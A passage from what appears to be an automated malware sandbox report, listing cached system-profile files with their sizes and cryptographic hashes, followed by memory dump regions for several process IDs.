                                                                                                                                    SHA256

                                                                                                                                    e98864cd2a3b0863275c8ec4c0a495105b3c8eac4762598627331a87eab298e4

                                                                                                                                    SHA512

                                                                                                                                    ef91b1d17f9129732e2a7b76ffee47b769b4a634c1994611e8f56094cd60cae6b73488775a402125ae3fb49f63928d87f59bb2e5dbd6c178bb0e2e0b1937bb48

                                                                                                                                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                    Filesize

                                                                                                                                    330B

                                                                                                                                    MD5

                                                                                                                                    585bc56fcd3b8322a82b3dee66a4603d

                                                                                                                                    SHA1

                                                                                                                                    909d0333623c4c3cbdd6529d8a9a4da736cad3b9

                                                                                                                                    SHA256

                                                                                                                                    88b8f9507cd88cfc7ad5575ca8de634a34e8c93022bf9ad131e231654b6687db

                                                                                                                                    SHA512

                                                                                                                                    e3e960198812364adf64303ec9087291c1a5c0308412a1a1262cbb54f72189a035fc60d0c133d77074d939b39ba39b0b1803ada33be75e5aa5dde7f08bc3118b

                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                                                                                    Filesize

                                                                                                                                    412B

                                                                                                                                    MD5

                                                                                                                                    408d40209e02cf94c7bdec6d359c3898

                                                                                                                                    SHA1

                                                                                                                                    26c0b913c911751e069e586864fc40e93e895629

                                                                                                                                    SHA256

                                                                                                                                    5178bc60dd1bd9182747c4b78427122caf097534164a1645c2a59bfd66dcf49f

                                                                                                                                    SHA512

                                                                                                                                    9a0687ea8a2a83f1be7375094837c6758dbb35e123a0083bf6e895e02cb54ff5c82e3d2194fa22444c4d38e84cc3e68b384335492a62db2a210c4b80c9b1d195

                                                                                                                                  • memory/340-60-0x0000027A56170000-0x0000027A5619B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/340-61-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/616-64-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/616-63-0x000001AF3D300000-0x000001AF3D32B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/664-55-0x000001F5634F0000-0x000001F56351B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/664-56-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/664-54-0x000001F5634C0000-0x000001F5634E4000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    144KB

                                                                                                                                  • memory/740-70-0x00000285A0970000-0x00000285A099B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/740-71-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/896-76-0x0000024C17890000-0x0000024C178BB000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/896-77-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/960-67-0x000002B55E3F0000-0x000002B55E41B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/960-68-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1120-79-0x000001DEDCD40000-0x000001DEDCD6B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1120-80-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1140-82-0x00000125535B0000-0x00000125535DB000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1140-83-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1148-88-0x000002C9ADE90000-0x000002C9ADEBB000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1148-89-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1156-92-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1156-91-0x000002376DE60000-0x000002376DE8B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1232-97-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1232-96-0x000001F3613D0000-0x000001F3613FB000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1316-101-0x0000013FF7530000-0x0000013FF755B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1316-102-0x00007FFBEB410000-0x00007FFBEB420000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1384-29-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                  • memory/1384-12-0x00000254960A0000-0x00000254960C2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                  • memory/1384-13-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                  • memory/1384-14-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                  • memory/1384-15-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                  • memory/3648-355-0x000001DEFB4D0000-0x000001DEFB4DA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                  • memory/3648-357-0x000001DEFB620000-0x000001DEFB62A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                  • memory/3648-361-0x000001DEFB670000-0x000001DEFB67A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                  • memory/3648-360-0x000001DEFB660000-0x000001DEFB666000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    24KB

                                                                                                                                  • memory/3648-359-0x000001DEFB630000-0x000001DEFB638000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/3648-353-0x000001DEFB3F0000-0x000001DEFB40C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    112KB

                                                                                                                                  • memory/3648-354-0x000001DEFB410000-0x000001DEFB4C5000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    724KB

                                                                                                                                  • memory/3648-358-0x000001DEFB680000-0x000001DEFB69A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    104KB

                                                                                                                                  • memory/3648-356-0x000001DEFB640000-0x000001DEFB65C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    112KB

                                                                                                                                  • memory/4048-1-0x00007FFC0D293000-0x00007FFC0D295000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/4048-0-0x0000000000D00000-0x0000000000D08000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/4272-48-0x00007FFC2B390000-0x00007FFC2B585000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                  • memory/4272-49-0x00007FFC2A770000-0x00007FFC2A82E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    760KB

                                                                                                                                  • memory/4272-43-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/4272-44-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/4272-47-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/4272-50-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/4272-42-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/4272-45-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    172KB